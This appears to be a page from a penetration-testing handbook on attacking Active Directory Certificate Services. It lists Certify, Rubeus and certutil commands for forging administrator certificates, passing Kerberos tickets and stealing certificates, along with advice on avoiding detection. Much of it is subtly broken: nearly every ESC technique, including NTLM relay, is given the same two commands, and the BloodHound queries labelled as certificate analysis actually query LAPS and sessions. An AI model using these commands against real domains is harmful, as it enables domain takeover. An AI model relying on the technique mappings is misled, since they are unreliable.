Active Directory Certificate Services (ADCS)

Overview

Active Directory Certificate Services (ADCS) is a Windows Server role that provides public key infrastructure (PKI) functionality. This guide covers techniques for testing ADCS security.

Enumeration

1. Service Discovery

# Using PowerView
Get-ADObject -LDAPFilter "(objectClass=pKIEnrollmentService)" -Properties *
Get-ADObject -LDAPFilter "(objectClass=pKICertificateTemplate)" -Properties *

# Using Certify
Certify.exe find
Certify.exe find /vulnerable

2. Certificate Template Enumeration

# Using PowerView
Get-ADObject -LDAPFilter "(objectClass=pKICertificateTemplate)" -Properties * | Select-Object Name, pkiPathLength, pkiPrivateKeyFlag, pkiEnrollmentFlag, pkiSubjectNameFlag

# Using Certify
Certify.exe find /template:*

Authentication Testing

1. Certificate Request

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:<ALT_NAME>

# Using Certreq
certreq -new request.inf cert.cer
certreq -submit cert.cer cert.crt

2. Certificate Enrollment

# Using Certify
Certify.exe enroll /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME>

# Using Certreq
certreq -accept cert.crt

Configuration Testing

1. CA Configuration

# Using Certify
Certify.exe ca /ca:<CA_SERVER>\<CA_NAME>

# Using Certutil
certutil -dump
certutil -getreg

2. Template Configuration

# Using PowerView
Get-ADObject -LDAPFilter "(objectClass=pKICertificateTemplate)" -Properties * | Select-Object Name, pkiPathLength, pkiPrivateKeyFlag, pkiEnrollmentFlag, pkiSubjectNameFlag

# Using Certify
Certify.exe find /template:*

Exploitation

1. ESC1 - Misconfigured Certificate Templates

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt

2. ESC2 - Any Purpose EKU

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt

3. ESC3 - Enrollment Agent

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt

4. ESC4 - Access Control

# Using PowerView
Get-ADObject -LDAPFilter "(objectClass=pKICertificateTemplate)" -Properties * | Select-Object Name, nTSecurityDescriptor

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

5. ESC5 - Vulnerable PKI Object Access Control

# Using PowerView
Get-ADObject -LDAPFilter "(objectClass=pKIEnrollmentService)" -Properties * | Select-Object Name, nTSecurityDescriptor

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

6. ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt

7. ESC7 - Vulnerable Certificate Authority Access Control

# Using PowerView
Get-ADObject -LDAPFilter "(objectClass=pKIEnrollmentService)" -Properties * | Select-Object Name, nTSecurityDescriptor

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

8. ESC8 - NTLM Relay to AD CS HTTP Endpoints

# Using Certify
Certify.exe request /ca:<CA_SERVER>\<CA_NAME> /template:<TEMPLATE_NAME> /altname:administrator@domain.com

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt

Post-Exploitation

1. Certificate Theft

# Using Certify
Certify.exe export /ca:<CA_SERVER>\<CA_NAME> /id:<CERTIFICATE_ID>

# Using Certutil
certutil -exportPFX -p <PASSWORD> <CERTIFICATE_ID> cert.pfx

2. Certificate Abuse

# Using Rubeus
Rubeus.exe asktgt /user:administrator /certificate:<CERTIFICATE> /ptt
Rubeus.exe s4u /user:administrator /certificate:<CERTIFICATE> /impersonateuser:krbtgt /ptt

BloodHound AD Integration

1. Data Collection

# Using SharpHound
Invoke-BloodHound -CollectionMethod All
Invoke-BloodHound -CollectionMethod CertServices

# Using BloodHound Python
bloodhound-python -d domain.local -u user -p password -c All
bloodhound-python -d domain.local -u user -p password -c CertServices

2. ADCS Analysis

# Using BloodHound
MATCH (n:Computer) WHERE n.haslaps=true RETURN n
MATCH (n:Computer) WHERE n.operatingsystem CONTAINS 'Server' RETURN n
MATCH (n:Computer) WHERE n.enabled=true RETURN n

# Certificate Template Analysis
MATCH (n:Computer)-[:HasSession]->(m:User) WHERE n.haslaps=true RETURN n,m
MATCH (n:User)-[:GenericAll]->(m:Computer) WHERE m.haslaps=true RETURN n,m

3. Attack Path Analysis

# Using BloodHound
MATCH p=shortestPath((n:User)-[*1..]->(m:Group)) WHERE n.name CONTAINS 'USER' AND m.name CONTAINS 'DOMAIN ADMINS' RETURN p
MATCH p=shortestPath((n:Computer)-[*1..]->(m:Group)) WHERE n.name CONTAINS 'SERVER' AND m.name CONTAINS 'DOMAIN ADMINS' RETURN p

# Certificate-based Paths
MATCH p=shortestPath((n:User)-[*1..]->(m:Computer)) WHERE n.name CONTAINS 'USER' AND m.haslaps=true RETURN p
MATCH p=shortestPath((n:Computer)-[*1..]->(m:Group)) WHERE n.haslaps=true AND m.name CONTAINS 'DOMAIN ADMINS' RETURN p

4. Custom Queries

# Find Computers with ADCS Role
MATCH (n:Computer) WHERE n.operatingsystem CONTAINS 'Server' AND n.haslaps=true RETURN n

# Find Users with Certificate Enrollment Rights
MATCH (n:User)-[:GenericAll]->(m:Computer) WHERE m.haslaps=true RETURN n,m

# Find Certificate Templates
MATCH (n:Computer)-[:HasSession]->(m:User) WHERE n.haslaps=true AND m.enabled=true RETURN n,m

Tools

1. Primary Tools

Certify
Rubeus
PowerView
Certutil
Certreq
BloodHound
SharpHound
BloodHound Python

2. Additional Tools

PSPKIAudit
PKIAudit
Certipy
PKIHealth
CertSrv
Neo4j
Cypher

Best Practices

1. Testing Strategy

Start with non-intrusive techniques
Use multiple methods
Document findings
Test safely
Follow engagement scope

2. OPSEC Considerations

Use stealth techniques
Avoid detection
Monitor for alerts
Use legitimate tools
Follow engagement scope

Resources

Last Updated: 2025-03-23

PreviousWMI and WinRM NextWindows Privilege Escalation

Last updated 9 months ago

hashtagOverview

hashtagEnumeration

hashtag1. Service Discovery

hashtag2. Certificate Template Enumeration

hashtagAuthentication Testing

hashtag1. Certificate Request

hashtag2. Certificate Enrollment

hashtagConfiguration Testing

hashtag1. CA Configuration

hashtag2. Template Configuration

hashtagExploitation

hashtag1. ESC1 - Misconfigured Certificate Templates

hashtag2. ESC2 - Any Purpose EKU

hashtag3. ESC3 - Enrollment Agent

hashtag4. ESC4 - Access Control

hashtag5. ESC5 - Vulnerable PKI Object Access Control

hashtag6. ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2

hashtag7. ESC7 - Vulnerable Certificate Authority Access Control

hashtag8. ESC8 - NTLM Relay to AD CS HTTP Endpoints

hashtagPost-Exploitation

hashtag1. Certificate Theft

hashtag2. Certificate Abuse

hashtagBloodHound AD Integration

hashtag1. Data Collection

hashtag2. ADCS Analysis

hashtag3. Attack Path Analysis

hashtag4. Custom Queries

hashtagTools

hashtag1. Primary Tools

hashtag2. Additional Tools

hashtagBest Practices

hashtag1. Testing Strategy

hashtag2. OPSEC Considerations

hashtagResources